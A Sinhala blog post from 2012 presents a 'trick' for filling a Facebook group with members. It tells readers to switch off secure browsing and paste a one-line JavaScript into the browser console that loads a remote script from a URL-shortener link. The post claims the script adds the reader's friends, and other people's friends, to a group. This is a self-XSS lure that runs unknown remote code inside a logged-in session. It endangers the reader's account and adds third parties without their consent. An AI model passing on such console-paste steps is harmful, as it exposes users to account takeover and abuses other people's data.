12/22/12

facebook ලොකූම ලොකු group එකක් හදමු




කට්ටියම දන්නවනේ ෆේස්බුක් එක කියන්නේ අපි කාටත් නැතුවම බැරි පොට් එකක් කියලා..හි හි.මම් අද කියලා දෙන්න යන්නේ ෆේස් බුක් එකේ ඇති පොඩි මිස්ටෙක් එකක් නිසා ෆේස්බුක් ගෘප් වලට මෙම්බර්ස්ලා ඇඩ් කරගන්න නියම ට්‍රික්ස් එකක් ගැනයි..මාක් අයියවත් ඒක හදන්න දන්නේ නැ මගේ හිතේ..

දැන් ඉතින් කට්ටිය කෑ ගහයි මේ අර ජාව ස්ක්‍රිප් එකද දෙන්නේ කියාලා..
මේ ඒ ක්‍රමේ නම් නෙවේ..හාත් පසින්ම වෙනස් ස්ක්‍රිප් එකක් වගේම කරන පියවරවල් ටිකක් වෙනස්..

මේකේ විශේශත්වය මොකද්ද : මේකෙන් අනුන්ගේ යාලුවෝ ලිස්ට් එකත් ඇඩ් කරගන්න පුලුවන් '


ඔය ලොකු ලොකු ගෘප් හැදිලා තියෙන්නේ මෙන්න මේ පට්ට වැඩෙන් තමයි..මම් කියලා දෙන්නම් ඔය මෙම්බර්ස්ලා නැ තුව අඩ අඩා ඉන්න පොඩි ගෘප් ඇඩ්මින්ලට.

01. Fire fox or chrome එකෙන් ඔයාට මෙම්බර්ස්ලා ඕනේ ගෘප් එකට යන්න.

02. Account setting > Security > Secure browsing off කරන්න.

03. මිතුරන් එකතු කල යුතු group එකට යන්න. https හරහා නොවිය යුතුයි.

04.පහත ඇති අලුත් ජාවා ස්ක්‍රිප්T කෝඩ් එක සම්පුර්ණ code එකම copy කරගන්න.

  • document.body.appendChild(document.createElement('script')).src='http://goo.gl/bq7sJ';



05. Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කරන්න එවිට බාර් එකක් එවි ඒකට මේ කෝඩ් එක past කරන්න.
Chrome නම් F12 ඇතුලත් කර අවසානයට ඇති "Console ටැබ් එක" type කරන තැනට ctrl + v වලින් past කරන්න.

06. කලින් කෝඩ් එක ඇඩ් කරනවා වගේ කී එක දැන්ම පාවිච්චි නොකරන්න.

07. දැන් අලුත් ටැබ් එකක් ඔපන් කරගන්න.ඒකේ ඔයගේ යාලුවෙක් ගේ ෆ්‍රෙන්ඩ් ලිස්ට් එක ඔපන් කරගෙන තියා ගන්න.

08. දැන් ඒ ඔපන් කරගත් ටැබ් එක පාරට රීලෝඩ් කරන්න..එසැනින් අනිත් ටැබ් එකේ ජවා ස්ක්‍රිප් එක රන් වෙන්න එන්ටර් කී එක ප්‍රෙස් කරන්න..

09. දැන් යාලුවෝ ඇඩ් වෙන්වා පෙන්නනවා ඇති.තව දෙයක් මේකෙන් අනුන්ගේ යාලුවෝ ඇඩ් වෙන්වා පෙන්නන්නේ ඔක්කොම ෆ්‍රෙන්ඩ්ස්ලා ඇඩ් වී තමන්ගේ ගෘප් එක තියෙන ටැබ් එක රී ලෝඩ් කල විටය..


සැලකිය යුතුයි.. : 

ෆ්‍රෙන්ඩ්ස්ලා ඇඩ් වෙනකන් ඒ බරව්සර් එක යුස් නොකර ඉන්න එක හා ක්ශනිකව යාලුවගේ ටැබ් එක රි ලෝඩ් කරන කොටම ඉහත ජාවා ස්ක්‍රිප් එක රන් කිරීමට එන්ටර් කී එක ප්‍රෙස් කිරීම..

කිහිප වරක් කලද අනුන්ගේ යාලුවෝ ඇඩ් නොවුනි කුමක් හෝ හෙතුවක් මත (සමහරවිට ෆේස්බුක් අප්ඩේට් නිසාවෙන් ) මගේ එක ප්‍රොෆයිල් එකකින්ද ඇඩ් කල නොහැක.ඒත් මගේ පරනම ප්‍රොෆයිල් එකෙන් නම් නියමෙට වැඩ..
කරුණාකර හොද ගෘප් එකකට මේ ක්‍රමය අනුගමනය කරන්න .නැත්තම් ගෘප් චාටර් වෙයි 


0 comments:

Post a Comment

Comment කරලා යන්න අමතක කරන්න එපා...